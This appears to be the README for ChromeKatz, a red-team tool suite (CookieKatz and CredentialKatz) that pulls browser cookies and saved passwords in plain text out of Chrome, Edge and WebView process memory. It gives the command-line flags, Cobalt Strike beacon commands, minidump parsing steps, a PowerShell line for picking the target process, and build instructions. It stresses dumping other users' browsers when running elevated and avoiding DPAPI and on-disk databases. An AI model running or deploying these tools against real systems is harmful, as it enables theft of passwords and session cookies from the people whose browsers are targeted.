ChromeKatz is a solution for dumping sensitive information from memory of Chromium based browsers. As for now, ChromeKatz consists of two projects:
- CookieKatz - The cookie dumper
- CredentialKatz - The password dumper
Both tools have an exe, Beacon Object File, and minidump parser available.
CredentialKatz is a project that allows operators to dump all credentials from Credential Manager of Chrome and Edge.
Most of the time Chromium based browsers keep your passwords in the credential manager encrypted until they are needed, either viewed in the credential manager, or auto filled to a login form. But for whatever reason, passwords_with_matching_reused_credentials_
of PasswordReuseDetectorImpl
class is populated with all credentials from the credential manager, in plain text. This will include all credentials that you have added to the password manager locally. If you have logged in the browser with your account, this will also include all the passwords you have ever synced with that account.
There are few perks in accessing credentials in this way.:
- Dump credentials of other user's browsers when running elevated
- DPAPI keys not needed to decrypt the credentials
- No need to touch on-disk database file
- Parse credential manager offline from a minidump file
This solution consists of three projects, CredentialKatz that is a PE executable, CredentialKatz-BOF the Beacon Object File version and CredentialKatzMinidump which is the minidump parser.
NOTE! When choosing using PID to target, use commands /list or cookie-katz-find respectively to choose the right subprocess!
Examples:
.\CredentialKatz.exe
By default targets first available Chrome process
.\CredentialKatz.exe /edge
Targets first available Edge process
.\CredentialKatz.exe /pid:<pid>
Attempts to target given pid, expecting it to be Chrome
.\CredentialKatz.exe /edge /pid:<pid>
Target the specified Edge process
Flags:
/edge Target current user Edge process
/pid Attempt to dump given pid, for example, someone else's if running elevated
/list List targettable processes, use with /edge to list Edge processes
/help This what you just did! -h works as well
beacon> help credential-katz
Dump credential manager from Chrome or Edge
Use: credential-katz [chrome|edge] [pid]
beacon> help cookie-katz-find
Find processes for credential-katz
Use: credential-katz-find [chrome|edge]
Usage:
CredentialKatzMinidump.exe <Path_to_minidump_file>
Example:
.\CredentialKatzMinidump.exe .\msedge.DMP
You need to dump the Chrome/Edge main process. Hint: It is the one with the smallest PID
CookieKatz is a project that allows operators to dump cookies from Chrome, Edge or Msedgewebview2 directly from the process memory. Chromium based browsers load all their cookies from the on-disk cookie database on startup.
The benefits of this approach are:
- Support dumping cookies from Chrome's Incogntio and Edge's In-Private processes
- Access cookies of other user's browsers when running elevated
- Dump cookies from webview processes
- No need to touch on-disk database file
- DPAPI keys not needed to decrypt the cookies
- Parse cookies offline from a minidump file
On the negative side, even as the method of finding the correct offsets in the memory are currently stable and work on multiple different versions, it will definitely break at some point in the future. 32bit browser installations are not supported and 32bit builds of CookieKatz are not supported either.
Currently only regular cookies are dumped. Chromium stores Partitioned Cookies in a different place and they are currently not included in the dump.
This solution consists of three projects, CookieKatz that is a PE executable, CookieKatz-BOF that is a Beacon Object File version and CookieKatzMinidump which is the minidump parser.
NOTE! When choosing using PID to target, use commands /list or cookie-katz-find respectively to choose the right subprocess!
Examples:
.\CookieKatz.exe
By default targets first available Chrome process
.\CookieKatz.exe /edge
Targets first available Edge process
.\CookieKatz.exe /pid:<pid>
Attempts to target given pid, expecting it to be Chrome
.\CookieKatz.exe /webview /pid:<pid>
Targets the given msedgewebview2 process
.\CookieKatz.exe /list /webview
Lists available webview processes
Flags:
/edge Target current user Edge process
/webview Target current user Msedgewebview2 process
/pid Attempt to dump given pid, for example, someone else's if running elevated
/list List targettable processes, use with /edge or /webview to target other browsers
/help This what you just did! -h works as well
beacon> help cookie-katz
Dump cookies from Chrome or Edge
Use: cookie-katz [chrome|edge|webview] [pid]
beacon> help cookie-katz-find
Find processes for Cookie-Katz
Use: cookie-katz-find [chrome|edge|webview]
Usage:
CookieKatzMinidump.exe <Path_to_minidump_file>
Example:
.\CookieKatzMinidump.exe .\msedge.DMP
To target correct process for creating the minidump, you can use the following PowerShell command:
Get-WmiObject Win32_Process | where {$_.CommandLine -match 'network.mojom.NetworkService'} | select -Property Name,ProcessId
Download the latest release build of the ChrokeKatz BOFs here. The zip file includes compiled BOFs and the CNA script to run them.
You may build both projects on Visual Studio with Release or Debug configuration and x64 platform.
BOF version has been developed with Cobalt Strike's Visual Studio template bof-vs. This means that Debug configuration for the *-BOFs will generate an exe instead of the COFF file. You can read more about the use of the Visual Studio template here.
You can compile your own BOF with nmake in x64 Native Tools Command Prompt for VS 2022:
nmake all